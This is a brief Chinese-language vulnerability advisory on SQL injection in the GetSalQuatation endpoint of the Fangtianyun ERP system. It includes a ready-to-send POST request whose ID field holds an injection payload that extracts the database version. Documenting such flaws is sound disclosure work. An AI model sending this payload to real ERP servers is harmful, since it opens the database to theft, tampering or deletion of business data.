漏洞描述
方天云ERP系统中的GetSalQuatation接口存在SQL注入漏洞。攻击者可以通过构造特殊的输入参数,将恶意的SQL代码注入到数据库查询中,从而窃取、篡改或删除数据库中的数据。
POST /AjaxMethods.asmx/GetSalQuatation HTTPS/1.1
Host:
Content-Type: application/json
{ID:"(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(CASE WHEN (8725=8725) THEN @@VERSION ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(106)+CHAR(113))"}